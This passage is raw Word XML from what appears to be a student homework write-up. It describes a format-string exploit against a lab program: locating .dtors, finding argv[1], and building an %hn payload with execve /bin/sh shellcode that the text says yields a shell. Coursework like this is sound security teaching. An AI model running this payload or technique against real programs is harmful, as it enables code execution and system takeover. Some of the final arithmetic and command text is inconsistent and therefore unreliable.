          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verify the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dtors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> section of the Snyder_HW_03_03 program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –h ./Snyder_HW_03_03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_dtors.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Find the address of the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dtors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –s –j .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dtors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Snyder_HW_03_03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_dtors.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Find the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[1] and its decimal equivalent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>for ((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = 250; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; 330; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>++)); do echo -n “$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: ” &amp;&amp; ./level09 “%$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\$s” &amp;&amp; echo -n $’\n’ ; done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_arg.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="00653BF0" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Use the address where command line arguments are stored to view </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>./Snyder_HW_03_03 %310\$x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_arg.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>For the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>8 bytes in length of 2 addresses in .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dtors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00081D7A" w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\x94\x04\x08\xd8\x94\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dealing with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[1]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Take the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[1] and separate it into 2 parts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0xbfd3 = 49107</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0x858a = 34186</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Write the smaller number first with a width specifier of 5, and one of 5 for the last 2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>49107-34186=14921</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Since we already have 33 bites in the payload, subtract that from 34186 to get the size we need to write</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="0002761A" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>34186-33=34153</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002761A" w:rsidRPr="00E5743C" w:rsidRDefault="008950C5" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%34153x%5\$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008950C5" w:rsidRPr="00E5743C" w:rsidRDefault="008950C5" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%#####x%6\$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008950C5" w:rsidRPr="00E5743C" w:rsidRDefault="008950C5" w:rsidP="0002761A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>####%310\$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00653BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To get the address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tmpBuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008950C5" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00653BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>./Snyder_HW_03_03 ’\xda\x94\x04\x08\xd8\x94\x04\x08\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80’%34153x%5\$hx#####%310\$hx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00653BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_tmpBuf.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Convert to integer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00653BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="000E3DE8" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>f50f</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="000E3DE8" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>62735</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Subtract the number of characters already printed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="000E3DE8" w:rsidP="00653BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>62735</w:t>
      </w:r>
      <w:r w:rsidR="00653BF0" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-34186=</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>28549</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653BF0" w:rsidRPr="00812EE3" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Run the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00812EE3" w:rsidRDefault="00653BF0" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>./Snyder_HW_03_03 ’\xda\x94\x04\x08\xd8\x94\x04\x08\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80’%34153x%5\$hx</w:t>
      </w:r>
      <w:r w:rsidR="000E3DE8" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>28549</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>5\$hn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00812EE3" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The result is </w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00812EE3" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>See Snyder_HW_03_03_shell.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00812EE3" w:rsidRDefault="00081D7A" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File names: </w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Snyder_HW_03_03.c; </w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
